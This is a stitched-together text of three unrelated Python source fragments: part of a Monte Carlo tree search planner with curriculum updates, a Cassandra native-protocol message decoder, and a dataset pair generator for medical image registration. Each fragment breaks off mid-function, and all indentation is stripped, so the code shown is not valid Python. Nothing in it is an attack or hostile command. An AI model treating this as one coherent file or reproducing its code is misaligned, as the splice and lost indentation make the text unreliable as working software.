self.condition = condition if condition is not None else self.condition
self.n_success = 0
self.n_fixed_rollouts = 0
self.n_samples = 1
self.bad_tree = False
self.post_cond = []
self.prim_pre_cond = []
self.x0 = None
self.node_history = {}
self.n_resets += 1
if 1.0 in self.val_per_run:
self.first_success = self.val_per_run.index(1.0)
self.first_suc_buf.append(self.first_success)
if self.agent.check_curric(self.first_suc_buf, self.n_thresh, self.curric_thresh, self.cur_curric):
self.first_suc_buf = []
self.cur_curric += 1
self.max_depth = min(self._max_depth, int(2 * self.max_depth))
print(('{0} updated curriculum to {1}'.format(self.log_file, self.cur_curric)))
# self.max_depth = min(self._max_depth, self.max_depth + 3)
else:
self.first_success = self.n_runs
self.first_suc_buf.append(max(10, self.first_success))
self.n_runs = 0
self.val_per_run = []
self.agent.replace_cond(self.condition, curric_step=self.cur_curric)
self.agent.reset(self.condition)
def get_new_problem(self):
self.reset()
self.agent.replace_conditions([self.condition])
def prob_func(self, prim_obs, soft=False):
prim_obs = prim_obs.reshape((1, -1))
distrs = self._prob_f(prim_obs)
if not soft: return distrs
out = []
for d in distrs:
new_d = np.zeros_like(d)
eta = 1e-1
exp = np.exp((d-np.max(d))/eta)
p = exp / np.sum(exp)
ind = np.random.choice(list(range(len(d))), p=p)
new_d[ind] = 1.
out.append(new_d)
return new_d
def value_func(self, obs):
obs = obs.reshape((1, -1))
return self._value_f(obs)
def update_vals(self, path, success):
node = self.root
for step in path:
node = node.get_child(*step)
if node is None:
node = MCTSNode(step,
int(success),
node,
len(self.tasks),
self.prim_dims)
else:
node.update_value(int(success))
def node_check_f(self, label, state, parent):
child = parent.get_child(label)
sample = Sample(self.agent)
sample.set_X(state.copy(), 0)
# sample.set(TARGETS_ENUM, self.agent.target_vecs[self.condition].copy(), 0)
sample.set(TRAJ_HIST_ENUM, np.array(self.agent.traj_hist).flatten(), 0)
self.agent.fill_sample(self.condition, sample, sample.get(STATE_ENUM, 0), 0, label, fill_obs=True)
# q_value = 0 if child is None else child.value
# prim_obs = sample.get_prim_obs(t=0)
val_obs = sample.get_val_obs(t=0)
q_value = self.value_func(val_obs)[0] if child is None else child.value
# policy_distrs = self.prob_func(prim_obs)
# prob = np.product([policy_distrs[ind][label[ind]] for ind in range(len(label))])
# child_explored = child.n_explored if child is not None else 0
# return self.value_func(val_obs)[1] + self.C * np.sqrt(parent.n_explored) / (1 + child_explored)
# return q_value + self.C * self.value_func(obs)[1] / (1 + child_explored)
return q_value + self.C * np.sqrt(np.log(parent.n_explored) / (1 + parent.n_child_explored[label]))
# child_value = child.value if child is not None else q_value
# return child_value + self.C * q_value / (1 + parent.n_child_explored[label])
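# Worked example of the UCB-style score returned above (numbers are purely
# illustrative): with child value q = 0.5, C = 0.2, parent.n_explored = 55
# (log(55) ~ 4.0) and n_child_explored[label] = 3, the score is about
# 0.5 + 0.2 * sqrt(4.0 / 4) = 0.7, so rarely-visited children get a larger
# exploration bonus.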
def multi_node_check_f(self, labels, state, parent):
sample = Sample(self.agent)
sample.set_X(state.copy(), 0)
sample.set(TARGETS_ENUM, self.agent.target_vecs[self.condition].copy(), 0)
# sample.set(TRAJ_HIST_ENUM, np.array(self.agent.traj_hist).flatten(), 0)
# self.agent.fill_sample(self.condition, sample, sample.get(STATE_ENUM, 0), 0, labels[0], fill_obs=True)
vals = []
for label in labels:
# self.agent.fill_sample(self.condition, sample, sample.get(STATE_ENUM, 0), 0, label, fill_obs=False)
child = parent.get_child(label)
# val_obs = sample.get_val_obs(t=0)
if False: # self.use_q:
self.agent.fill_sample(self.condition, sample, sample.get(STATE_ENUM, 0), 0, label, fill_obs=False)
val_obs = sample.get_val_obs(t=0)
q_value = self.value_func(val_obs)[0] if child is None else child.value
else:
q_value = 0 if child is None else child.value
vals.append(q_value + self.C * np.sqrt(np.log(parent.n_explored) / (1 + parent.n_child_explored[label])))
# vals.append(q_value + \
# self.C * np.sqrt(np.log(parent.n_explored) / (1 + parent.n_child_explored[label])) + \
# self.C * np.sqrt(np.log(self.n_samples) / (1 + self.n_explored[label])))
return vals
def print_run(self, state, use_distilled=True):
value, path = self.simulate(state.copy(), use_distilled, debug=False)
print('Testing rollout of MCTS')
for sample in path:
task = self.tasks[np.argmax(sample.get(TASK_ENUM, t=0))]
targ = self.agent.targ_list[np.argmax(sample.get(TARG_ENUM, t=0))]
print((task, targ))
print((sample.get_X()))
print('End of MCTS rollout.\n\n')
def run(self, state, num_rollouts=20, use_distilled=True, hl_plan=None, new_policies=None,
<filename>cassandra/decoder.py
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from binascii import hexlify
from collections import namedtuple
try:
from collections import OrderedDict
except ImportError: # Python <2.7
from cassandra.util import OrderedDict # NOQA
import datetime
import logging
import socket
import types
from uuid import UUID
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO # ignore flake8 warning: # NOQA
from cassandra import (ConsistencyLevel, Unavailable, WriteTimeout, ReadTimeout,
AlreadyExists, InvalidRequest, Unauthorized)
from cassandra.marshal import (int32_pack, int32_unpack, uint16_pack, uint16_unpack,
int8_pack, int8_unpack)
from cassandra.cqltypes import (AsciiType, BytesType, BooleanType,
CounterColumnType, DateType, DecimalType,
DoubleType, FloatType, Int32Type,
InetAddressType, IntegerType, ListType,
LongType, MapType, SetType, TimeUUIDType,
UTF8Type, UUIDType)
log = logging.getLogger(__name__)
class NotSupportedError(Exception):
pass
class InternalError(Exception):
pass
PROTOCOL_VERSION = 0x01
PROTOCOL_VERSION_MASK = 0x7f
HEADER_DIRECTION_FROM_CLIENT = 0x00
HEADER_DIRECTION_TO_CLIENT = 0x80
HEADER_DIRECTION_MASK = 0x80
def tuple_factory(colnames, rows):
return rows
def named_tuple_factory(colnames, rows):
Row = namedtuple('Row', colnames)
return [Row(*row) for row in rows]
def dict_factory(colnames, rows):
return [dict(zip(colnames, row)) for row in rows]
def ordered_dict_factory(colnames, rows):
return [OrderedDict(zip(colnames, row)) for row in rows]
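# Hedged illustration of the row factories above, for colnames = ['a', 'b'] and
# rows = [(1, 2)]:
#   tuple_factory        -> [(1, 2)]
#   named_tuple_factory  -> [Row(a=1, b=2)]
#   dict_factory         -> [{'a': 1, 'b': 2}]
#   ordered_dict_factory -> [OrderedDict([('a', 1), ('b', 2)])]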
_message_types_by_name = {}
_message_types_by_opcode = {}
class _register_msg_type(type):
def __init__(cls, name, bases, dct):
if not name.startswith('_'):
_message_types_by_name[cls.name] = cls
_message_types_by_opcode[cls.opcode] = cls
class _MessageType(object):
__metaclass__ = _register_msg_type
params = ()
tracing = False
def __init__(self, **kwargs):
for pname in self.params:
try:
pval = kwargs[pname]
except KeyError:
raise ValueError("%s instances need the %s keyword parameter"
% (self.__class__.__name__, pname))
setattr(self, pname, pval)
def to_string(self, stream_id, compression=None):
body = StringIO()
self.send_body(body)
body = body.getvalue()
version = PROTOCOL_VERSION | HEADER_DIRECTION_FROM_CLIENT
flags = 0
if compression is not None and len(body) > 0:
body = compression(body)
flags |= 0x01
if self.tracing:
flags |= 0x02
msglen = int32_pack(len(body))
msg_parts = map(int8_pack, (version, flags, stream_id, self.opcode)) + [msglen, body]
return ''.join(msg_parts)
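# Frame layout assembled above, field sizes in bytes:
#   version(1) | flags(1) | stream_id(1) | opcode(1) | body length(4, int32) | body(N)
# decode_response() below interprets the flags and opcode of responses framed
# the same way by the server.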
def send(self, f, streamid, compression=None):
body = StringIO()
self.send_body(body)
body = body.getvalue()
version = PROTOCOL_VERSION | HEADER_DIRECTION_FROM_CLIENT
flags = 0
if compression is not None and len(body) > 0:
body = compression(body)
flags |= 0x01
if self.tracing:
flags |= 0x02
msglen = int32_pack(len(body))
header = ''.join(map(int8_pack, (version, flags, streamid, self.opcode))) \
+ msglen
f.write(header)
if len(body) > 0:
f.write(body)
def __str__(self):
paramstrs = ['%s=%r' % (pname, getattr(self, pname)) for pname in self.params]
return '<%s(%s)>' % (self.__class__.__name__, ', '.join(paramstrs))
__repr__ = __str__
def decode_response(stream_id, flags, opcode, body, decompressor=None):
if flags & 0x01:
if decompressor is None:
raise Exception("No decompressor available for compressed frame!")
body = decompressor(body)
flags ^= 0x01
body = StringIO(body)
if flags & 0x02:
trace_id = UUID(bytes=body.read(16))
flags ^= 0x02
else:
trace_id = None
if flags:
log.warn("Unknown protocol flags set: %02x. May cause problems." % flags)
msg_class = _message_types_by_opcode[opcode]
msg = msg_class.recv_body(body)
msg.stream_id = stream_id
msg.trace_id = trace_id
return msg
error_classes = {}
class ErrorMessage(_MessageType, Exception):
opcode = 0x00
name = 'ERROR'
params = ('code', 'message', 'info')
summary = 'Unknown'
@classmethod
def recv_body(cls, f):
code = read_int(f)
msg = read_string(f)
subcls = error_classes.get(code, cls)
extra_info = subcls.recv_error_info(f)
return subcls(code=code, message=msg, info=extra_info)
def summary_msg(self):
msg = 'code=%04x [%s] message="%s"' \
% (self.code, self.summary, self.message)
if self.info is not None:
msg += (' info=' + repr(self.info))
return msg
def __str__(self):
return '<ErrorMessage %s>' % self.summary_msg()
__repr__ = __str__
@staticmethod
def recv_error_info(f):
pass
def to_exception(self):
return self
class ErrorMessageSubclass(_register_msg_type):
def __init__(cls, name, bases, dct):
if cls.error_code is not None:
error_classes[cls.error_code] = cls
class ErrorMessageSub(ErrorMessage):
__metaclass__ = ErrorMessageSubclass
error_code = None
class RequestExecutionException(ErrorMessageSub):
pass
class RequestValidationException(ErrorMessageSub):
pass
class ServerError(ErrorMessageSub):
summary = 'Server error'
error_code = 0x0000
class ProtocolException(ErrorMessageSub):
summary = 'Protocol error'
error_code = 0x000A
class UnavailableErrorMessage(RequestExecutionException):
summary = 'Unavailable exception'
error_code = 0x1000
@staticmethod
def recv_error_info(f):
return {
'consistency': read_consistency_level(f),
'required_replicas': read_int(f),
'alive_replicas': read_int(f),
}
def to_exception(self):
return Unavailable(self.summary_msg(), **self.info)
class OverloadedErrorMessage(RequestExecutionException):
summary = 'Coordinator node overloaded'
error_code = 0x1001
class IsBootstrappingErrorMessage(RequestExecutionException):
summary = 'Coordinator node is bootstrapping'
error_code = 0x1002
class TruncateError(RequestExecutionException):
summary = 'Error during truncate'
error_code = 0x1003
class WriteTimeoutErrorMessage(RequestExecutionException):
summary = 'Timeout during write request'
error_code = 0x1100
@staticmethod
def recv_error_info(f):
return {
'consistency': read_consistency_level(f),
'received_responses': read_int(f),
'required_responses': read_int(f),
'write_type': read_string(f),
}
def to_exception(self):
return WriteTimeout(self.summary_msg(), **self.info)
class ReadTimeoutErrorMessage(RequestExecutionException):
summary = 'Timeout during read request'
error_code = 0x1200
@staticmethod
def recv_error_info(f):
return {
'consistency': read_consistency_level(f),
'received_responses': read_int(f),
'required_responses': read_int(f),
'data_retrieved': bool(read_byte(f)),
}
def to_exception(self):
return ReadTimeout(self.summary_msg(), **self.info)
class SyntaxException(RequestValidationException):
summary = 'Syntax error in CQL query'
error_code = 0x2000
class UnauthorizedErrorMessage(RequestValidationException):
summary = 'Unauthorized'
error_code = 0x2100
def to_exception(self):
return Unauthorized(self.summary_msg())
class InvalidRequestException(RequestValidationException):
summary = 'Invalid query'
error_code = 0x2200
def to_exception(self):
return InvalidRequest(self.summary_msg())
class ConfigurationException(RequestValidationException):
summary = 'Query invalid because of configuration issue'
error_code = 0x2300
class PreparedQueryNotFound(RequestValidationException):
summary = 'Matching prepared statement not found on this node'
error_code = 0x2500
@staticmethod
def recv_error_info(f):
# return the query ID
return read_binary_string(f)
class AlreadyExistsException(ConfigurationException):
summary = 'Item already exists'
error_code = 0x2400
@staticmethod
def recv_error_info(f):
return {
'keyspace': read_string(f),
'table': read_string(f),
}
def to_exception(self):
return AlreadyExists(**self.info)
class StartupMessage(_MessageType):
opcode = 0x01
name = 'STARTUP'
params = ('cqlversion', 'options')
KNOWN_OPTION_KEYS = set((
'CQL_VERSION',
'COMPRESSION',
))
def send_body(self, f):
optmap = self.options.copy()
optmap['CQL_VERSION'] = self.cqlversion
write_stringmap(f, optmap)
class ReadyMessage(_MessageType):
opcode = 0x02
name = 'READY'
params = ()
@classmethod
def recv_body(cls, f):
return cls()
class AuthenticateMessage(_MessageType):
opcode = 0x03
name = 'AUTHENTICATE'
params = ('authenticator',)
@classmethod
def recv_body(cls, f):
authname = read_string(f)
return cls(authenticator=authname)
class CredentialsMessage(_MessageType):
opcode = 0x04
name = 'CREDENTIALS'
params = ('creds',)
def send_body(self, f):
write_short(f, len(self.creds))
for credkey, credval in self.creds.items():
write_string(f, credkey)
write_string(f, credval)
class OptionsMessage(_MessageType):
opcode = 0x05
name = 'OPTIONS'
params = ()
def send_body(self, f):
pass
class SupportedMessage(_MessageType):
opcode = 0x06
name = 'SUPPORTED'
params = ('cql_versions', 'options',)
@classmethod
def recv_body(cls, f):
options = read_stringmultimap(f)
cql_versions = options.pop('CQL_VERSION')
return cls(cql_versions=cql_versions, options=options)
class QueryMessage(_MessageType):
opcode = 0x07
name = 'QUERY'
params = ('query', 'consistency_level',)
def send_body(self, f):
write_longstring(f, self.query)
write_consistency_level(f, self.consistency_level)
class ResultMessage(_MessageType):
opcode = 0x08
name = 'RESULT'
params = ('kind', 'results',)
KIND_VOID = 0x0001
KIND_ROWS = 0x0002
KIND_SET_KEYSPACE = 0x0003
KIND_PREPARED = 0x0004
KIND_SCHEMA_CHANGE = 0x0005
type_codes = {
0x0001: AsciiType,
0x0002: LongType,
0x0003: BytesType,
0x0004: BooleanType,
0x0005: CounterColumnType,
0x0006: DecimalType,
0x0007: DoubleType,
0x0008: FloatType,
0x0009: Int32Type,
0x000A: UTF8Type,
0x000B: DateType,
0x000C: UUIDType,
0x000D: UTF8Type,
0x000E: IntegerType,
0x000F: TimeUUIDType,
0x0010: InetAddressType,
0x0020: ListType,
0x0021: MapType,
0x0022: SetType,
}
FLAGS_GLOBAL_TABLES_SPEC = 0x0001
@classmethod
def recv_body(cls, f):
kind = read_int(f)
if kind == cls.KIND_VOID:
results = None
elif kind == cls.KIND_ROWS:
results = cls.recv_results_rows(f)
elif kind == cls.KIND_SET_KEYSPACE:
ksname = read_string(f)
results = ksname
elif kind == cls.KIND_PREPARED:
results = cls.recv_results_prepared(f)
elif kind == cls.KIND_SCHEMA_CHANGE:
results = cls.recv_results_schema_change(f)
return cls(kind=kind, results=results)
@classmethod
def recv_results_rows(cls, f):
column_metadata = cls.recv_results_metadata(f)
rowcount = read_int(f)
rows = [cls.recv_row(f, len(column_metadata)) for x in xrange(rowcount)]
colnames = [c[2] for c in column_metadata]
coltypes = [c[3] for c in column_metadata]
return (colnames, [tuple(ctype.from_binary(val) for ctype, val in zip(coltypes, row))
for row in rows])
@classmethod
def recv_results_prepared(cls, f):
query_id = read_binary_string(f)
column_metadata = cls.recv_results_metadata(f)
return (query_id, column_metadata)
@classmethod
def recv_results_metadata(cls, f):
flags = read_int(f)
glob_tblspec = bool(flags & cls.FLAGS_GLOBAL_TABLES_SPEC)
colcount = read_int(f)
if glob_tblspec:
ksname = read_string(f)
cfname = read_string(f)
column_metadata = []
for x in xrange(colcount):
if glob_tblspec:
colksname = ksname
colcfname = cfname
else:
colksname = read_string(f)
colcfname = read_string(f)
colname = read_string(f)
coltype = cls.read_type(f)
column_metadata.append((colksname, colcfname, colname, coltype))
return column_metadata
@classmethod
def recv_results_schema_change(cls, f):
change_type = read_string(f)
keyspace = read_string(f)
table = read_string(f)
return dict(change_type=change_type, keyspace=keyspace, table=table)
@classmethod
def read_type(cls, f):
optid = read_short(f)
try:
typeclass = cls.type_codes[optid]
except KeyError:
raise NotSupportedError("Unknown data type code 0x%x. Have to skip"
" entire result set." % optid)
if typeclass in (ListType, SetType):
subtype = cls.read_type(f)
typeclass = typeclass.apply_parameters(subtype)
elif typeclass == MapType:
keysubtype = cls.read_type(f)
valsubtype = cls.read_type(f)
typeclass = typeclass.apply_parameters(keysubtype, valsubtype)
return typeclass
@staticmethod
def
<filename>data_pre/reg_data_pool.py
from __future__ import print_function
import progressbar as pb
from easyreg.reg_data_utils import *
from data_pre.reg_preprocess_example.oasis_longitude_reg import *
import copy
sesses = ['train', 'val', 'test', 'debug']
number_of_workers = 10
warning_once = True
class BaseRegDataSet(object):
def __init__(self, dataset_type, sched=None):
"""
:param name: name of data set
:param dataset_type: 'mixed' like OASIS, which includes inter- and intra-person pairs, or 'custom' like LPBA40, which only includes inter-person pairs
:param file_type_list: the file types to be filtered, like [*1_a.bmp, *2_a.bmp]
:param data_path: path of the dataset
"""
self.data_path = None
"""path of the dataset"""
self.output_path = None
"""path of the output directory"""
self.pro_data_path = None
self.pair_name_list = []
self.pair_path_list = []
self.file_type_list = None
self.max_used_train_samples = -1
self.max_pairs = -1
self.sever_switch = None
self.save_format = 'h5py'
"""currently only support h5py"""
self.sched = sched
"""inter or intra, for inter-personal or intra-personal registration"""
self.dataset_type = dataset_type
"""custom or mixed"""
self.saving_h5py=False
"""if true, save the preprocessed results as h5py"""
self.normalize= False
""" settings for normalization, currently not used"""
self.divided_ratio = (0.7, 0.1, 0.2)
"""divided the data into train, val, test set"""
def generate_pair_list(self):
pass
def set_data_path(self, path):
self.data_path = path
def set_label_path(self, path):
self.label_path = path
def set_output_path(self, path):
self.output_path = path
make_dir(path)
def set_divided_ratio(self,ratio):
self.divided_ratio = ratio
def get_file_num(self):
return len(self.pair_path_list)
def get_pair_name_list(self):
return self.pair_name_list
def save_pair_to_txt(self,info=None):
pass
def gen_pair_dic(self):
pass
def prepare_data(self):
"""
preprocessig data for each dataset
:return:
"""
print("starting preapare data..........")
print("the output file path is: {}".format(self.output_path))
info=self.gen_pair_dic()
self.save_pair_to_txt(copy.deepcopy(info))
print("data preprocessing finished")
class CustomDataSet(BaseRegDataSet):
"""
This class only compatible with dataset_type "mixed" and "custom"
unlabeled dataset
"""
def __init__(self,dataset_type, sched=None):
BaseRegDataSet.__init__(self,dataset_type,sched)
self.aug_test_for_seg_task = False
self.reg_coupled_pair = False
self.coupled_pair_list = []
self.find_corr_label = find_corr_map
self.label_switch = ('', '')
self.label_path = None
def __gen_path_and_name_dic(self, pair_list_dic):
divided_path_and_name_dic = {}
divided_path_and_name_dic['pair_path_list'] = pair_list_dic
divided_path_and_name_dic['pair_name_list'] = self.__gen_pair_name_list(pair_list_dic)
return divided_path_and_name_dic
def __gen_pair_name_list(self, pair_list_dic):
return {sess: [generate_pair_name([path[0],path[1]]) for path in pair_list_dic[sess]] for sess
in sesses}
def __gen_pair_list(self,img_path_list, pair_num_limit = 1000):
img_pair_list = []
label_path_list = self.find_corr_label(img_path_list, self.label_path, self.label_switch)
num_img = len(img_path_list)
for i in range(num_img):
count_max=15 #15
img_pair_list_tmp =[]
for j in range(num_img):
if i!=j:
if self.label_path is not None:
img_pair_list_tmp.append([img_path_list[i],img_path_list[j],
label_path_list[i],label_path_list[j]])
else:
img_pair_list_tmp.append([img_path_list[i], img_path_list[j]])
if len(img_pair_list_tmp)>count_max:
img_pair_list_tmp= random.sample(img_pair_list_tmp,count_max)
img_pair_list += img_pair_list_tmp
if pair_num_limit >= 0:
random.shuffle(img_pair_list)
return img_pair_list[:pair_num_limit]
else:
return img_pair_list
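# Rough pair-count arithmetic for the helper above (illustrative numbers): with
# 100 images, each source image keeps at most count_max=15 of its 99 candidate
# partners, so at most ~1500 ordered pairs are collected before the optional
# shuffle and truncation to pair_num_limit.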
def __gen_pair_list_from_two_list(self,img_path_list_1, img_path_list_2, pair_num_limit = 1000):
img_pair_list = []
label_path_list_1 = self.find_corr_label(img_path_list_1, self.label_path, self.label_switch)
label_path_list_2 = self.find_corr_label(img_path_list_2, self.label_path, self.label_switch)
num_img_1 = len(img_path_list_1)
num_img_2 = len(img_path_list_2)
for i in range(num_img_1):
count_max=15 #15
img_pair_list_tmp =[]
for j in range(num_img_2):
if self.label_path is not None:
img_pair_list_tmp.append([img_path_list_1[i],img_path_list_2[j],
label_path_list_1[i],label_path_list_2[j]])
else:
img_pair_list_tmp.append([img_path_list_1[i], img_path_list_2[j]])
if len(img_pair_list_tmp)>count_max:
img_pair_list_tmp= random.sample(img_pair_list_tmp,count_max)
img_pair_list += img_pair_list_tmp
if pair_num_limit >= 0:
random.shuffle(img_pair_list)
return img_pair_list[:pair_num_limit]
else:
return img_pair_list
def __gen_pair_list_with_coupled_list(self,pair_path_list, pair_num_limit = 1000):
img_pair_list = []
img_path_list_1 = [pair_path[0] for pair_path in pair_path_list]
img_path_list_2 = [pair_path[1] for pair_path in pair_path_list]
label_path_list_1 = self.find_corr_label(img_path_list_1, self.label_path, self.label_switch)
label_path_list_2 = self.find_corr_label(img_path_list_2, self.label_path, self.label_switch)
has_label = [os.path.exists(p1) and os.path.exists(p2) for p1, p2 in zip(label_path_list_1,label_path_list_2)]
num_img_1 = len(img_path_list_1)
num_img_2 = len(img_path_list_2)
assert num_img_1 == num_img_2
for i in range(num_img_1):
if has_label[i]:
img_pair_list.append([img_path_list_1[i],img_path_list_2[i],
label_path_list_1[i],label_path_list_2[i]])
else:
img_pair_list.append([img_path_list_1[i], img_path_list_2[i]])
if pair_num_limit >= 0:
random.shuffle(img_pair_list)
return img_pair_list[:pair_num_limit]
else:
return img_pair_list
def __gen_across_file_pair_dic(self):
num_pair_limit = self.max_pairs # -1
img_path_list = get_file_path_list(self.data_path, self.file_type_list)
if self.sever_switch is not None:
img_path_list = [img_path.replace(self.sever_switch[0], self.sever_switch[1]) for img_path in img_path_list]
sub_folder_dic, sub_patients_dic = self.__divide_into_train_val_test_set(self.output_path, img_path_list,
self.divided_ratio)
gen_pair_list_func = self.__gen_pair_list
max_ratio = {'train': self.divided_ratio[0], 'val': self.divided_ratio[1], 'test': self.divided_ratio[2],
'debug': self.divided_ratio[1]}
if self.max_used_train_samples>-1:
sub_patients_dic['train'] = sub_patients_dic['train'][:self.max_used_train_samples]
if not self.aug_test_for_seg_task:
pair_list_dic = {sess: gen_pair_list_func(sub_patients_dic[sess], int(
num_pair_limit * max_ratio[sess]) if num_pair_limit > 0 else -1) for
sess in sesses}
else:
pair_list_dic = {sess: gen_pair_list_func(sub_patients_dic[sess], int(
num_pair_limit * max_ratio[sess]) if num_pair_limit > 0 else -1) for
sess in ['train', 'val', 'debug']}
pair_list_dic['test'] = self.__gen_pair_list_from_two_list(sub_patients_dic['test'],
sub_patients_dic['train'][:10],
int(num_pair_limit * max_ratio[
"test"]) if num_pair_limit > 0 else -1)
divided_path_and_name_dic = self.__gen_path_and_name_dic(pair_list_dic)
return (sub_folder_dic, divided_path_and_name_dic)
def __gen_pair_dic_with_given_pair(self):
num_pair_limit = self.max_pairs # -1
pair_path_list =self.coupled_pair_list
if self.sever_switch is not None:
pair_path_list = [[img_path.replace(self.sever_switch[0], self.sever_switch[1]) for img_path in pair_path] for pair_path in pair_path_list]
sub_folder_dic, sub_patients_dic = self.__divide_into_train_val_test_set(self.output_path, pair_path_list,
self.divided_ratio)
gen_pair_list_func = self.__gen_pair_list_with_coupled_list
max_ratio = {'train': self.divided_ratio[0], 'val': self.divided_ratio[1], 'test': self.divided_ratio[2],
'debug': self.divided_ratio[1]}
if self.max_used_train_samples > -1:
sub_patients_dic['train'] = sub_patients_dic['train'][:self.max_used_train_samples]
pair_list_dic = {sess: gen_pair_list_func(sub_patients_dic[sess], int(
num_pair_limit * max_ratio[sess]) if num_pair_limit > 0 else -1) for
sess in sesses}
divided_path_and_name_dic = self.__gen_path_and_name_dic(pair_list_dic)
return (sub_folder_dic, divided_path_and_name_dic)
def gen_pair_dic(self):
if not self.reg_coupled_pair:
return self.__gen_across_file_pair_dic()
else:
return self.__gen_pair_dic_with_given_pair()
def __divide_into_train_val_test_set(self,root_path, img_path_list, ratio):
num_img = len(img_path_list)
train_ratio = ratio[0]
val_ratio = ratio[1]
sub_path = {x: os.path.join(root_path, x) for x in ['train', 'val', 'test', 'debug']}
nt = [make_dir(sub_path[key]) for key in sub_path]
if sum(nt):
raise ValueError("the data has already exist, due to randomly assignment schedule, the program block\n"
"manually delete the folder to reprepare the data")
train_num = int(train_ratio * num_img)
val_num = int(val_ratio * num_img)
sub_patients_dic = {}
sub_patients_dic['train'] = img_path_list[:train_num]
sub_patients_dic['val'] = img_path_list[train_num: train_num + val_num]
sub_patients_dic['test'] = img_path_list[train_num + val_num:]
sub_patients_dic['debug'] = img_path_list[: val_num]
return sub_path,sub_patients_dic
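    # Example of the split above (the ratio values are assumptions): with
    # divided_ratio = [0.7, 0.1, 0.2] and 100 image paths, 'train' gets the first 70,
    # 'val' the next 10, 'test' the remaining 20, and 'debug' reuses the first
    # val_num (10) paths of the original list.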
def save_pair_to_txt(self, info=None):
sub_folder_dic, divided_path_and_name_dic = info
saving_pair_info(sub_folder_dic, divided_path_and_name_dic)
class PatientStructureDataSet(BaseRegDataSet):
"""
    The data under self.data_root_path will be loaded.
"""
def __init__(self, dataset_type, sched):
BaseRegDataSet.__init__(self, dataset_type,sched)
self.patients = []
self.only_test_set=False
"""all available data would be regarded as test data, no training and validation set would be generated"""
self.data_root_path = None
def initialize_info(self):
self.__init_patients()
def set_data_root_path(self,data_root_path):
self.data_root_path = data_root_path
def __init_patients(self):
if self.data_root_path is None:
if not self.only_test_set:
root_path ="/playpen/zyshen/summer/oai_registration/reg_0623/data"
else:
root_path ="/playpen/zyshen/summer/oai_registration/reg_0820/data"
else:
root_path = self.data_root_path
Patient_class = Patients(full_init=True, root_path=root_path)
self.patients= Patient_class.get_filtered_patients_list(has_complete_label=True, len_time_range=[1, 10], use_random=False)
print("total {} of paitents are selected".format(len(self.patients)))
def __divide_into_train_val_test_set(self,root_path, patients, ratio):
num_patient = len(patients)
train_ratio = ratio[0]
val_ratio = ratio[1]
sub_path = {x: os.path.join(root_path, x) for x in ['train', 'val', 'test', 'debug']}
nt = [make_dir(sub_path[key]) for key in sub_path]
if sum(nt):
raise ValueError("the data has already exist, due to randomly assignment schedule, the program block\n"
"manually delete the folder to reprepare the data")
train_num = int(train_ratio * num_patient)
val_num = int(val_ratio * num_patient)
sub_patients_dic = {}
sub_patients_dic['train'] = patients[:train_num]
sub_patients_dic['val'] = patients[train_num: train_num + val_num]
sub_patients_dic['test'] = patients[train_num + val_num:]
sub_patients_dic['debug'] = patients[: val_num]
return sub_path,sub_patients_dic
def __gen_intra_pair_list(self,patients, pair_num_limit = 1000):
intra_pair_list = []
for patient in patients:
for modality in patient.modality:
for specificity in patient.specificity:
intra_image_list = patient.get_slice_path_list(modality,specificity)
intra_label_list = patient.get_label_path_list(modality,specificity)
num_images = len(intra_image_list)
for i, image in enumerate(intra_image_list):
for j in range(i+1, num_images):
intra_pair_list.append([intra_image_list[i],intra_image_list[j],
intra_label_list[i],intra_label_list[j]])
# intra_pair_list.append([intra_image_list[j], intra_image_list[i], used in old code
# intra_label_list[j], intra_label_list[i]])
# if pair_num_limit>=0 and len(intra_pair_list)> 5*pair_num_limit:
# break
if pair_num_limit >= 0:
random.shuffle(intra_pair_list)
return intra_pair_list[:pair_num_limit]
else:
return intra_pair_list
def __gen_inter_pair_list(self, patients,pair_num_limit = 1000):
"""
        Here we only use the first time period for inter-image registration.
:param patients:
:param pair_num_limit:
:return:
"""
inter_pair_list = []
num_patients = len(patients)
if pair_num_limit==0:
return inter_pair_list
while True:
rand_pair_id = [int(num_patients * random.random()), int(num_patients * random.random())]
patient_a = patients[rand_pair_id[0]]
patient_b = patients[rand_pair_id[1]]
modality_list = patient_a.modality
specificity_list = patient_a.specificity
modality_id = int(len(modality_list)*random.random())
specificity_id = int(len(specificity_list)*random.random())
            patient_a_slice = patient_a.get_slice_path_list(modality_list[modality_id],specificity_list[specificity_id])
            patient_a_label = patient_a.get_label_path_list(modality_list[modality_id],specificity_list[specificity_id])
            slice_id_a = int(len(patient_a_slice)*random.random())
            # only fetch patient_b's slices once we know it shares the sampled modality and specificity
            if modality_list[modality_id] in patient_b.modality:
                if specificity_list[specificity_id] in patient_b.specificity:
                    patient_b_slice = patient_b.get_slice_path_list(modality_list[modality_id],specificity_list[specificity_id])
                    patient_b_label = patient_b.get_label_path_list(modality_list[modality_id],specificity_list[specificity_id])
                    slice_id_b = int(len(patient_b_slice)*random.random())
                    pair = [patient_a_slice[slice_id_a], patient_b_slice[slice_id_b],
                            patient_a_label[slice_id_a], patient_b_label[slice_id_b]]
                    inter_pair_list.append(pair)
            if len(inter_pair_list)> pair_num_limit:
                break
return inter_pair_list
def __gen_path_and_name_dic(self, pair_list_dic):
divided_path_and_name_dic={}
divided_path_and_name_dic['pair_path_list'] = pair_list_dic
divided_path_and_name_dic['pair_name_list'] = self.__gen_pair_name_list(pair_list_dic)
return divided_path_and_name_dic
def __gen_pair_name_list(self,pair_list_dic):
return {sess:[generate_pair_name([path[0],path[1]]) for path in pair_list_dic[sess]] for sess in sesses}
def gen_pair_dic(self):
if self.only_test_set:
            self.divided_ratio = [0., 0., 1.]
num_pair_limit = 150 # -1 if self.sched=='intra' else 300 used in old code
else:
num_pair_limit = 2000 #-1 used in old code
sub_folder_dic, sub_patients_dic =self.__divide_into_train_val_test_set(self.output_path,self.patients,self.divided_ratio)
        gen_pair_list_func = self.__gen_intra_pair_list if self.sched=='intra' else self.__gen_inter_pair_list
max_ratio = {'train':self.divided_ratio[0],'val':self.divided_ratio[1],'test':self.divided_ratio[2],'debug':self.divided_ratio[1]}
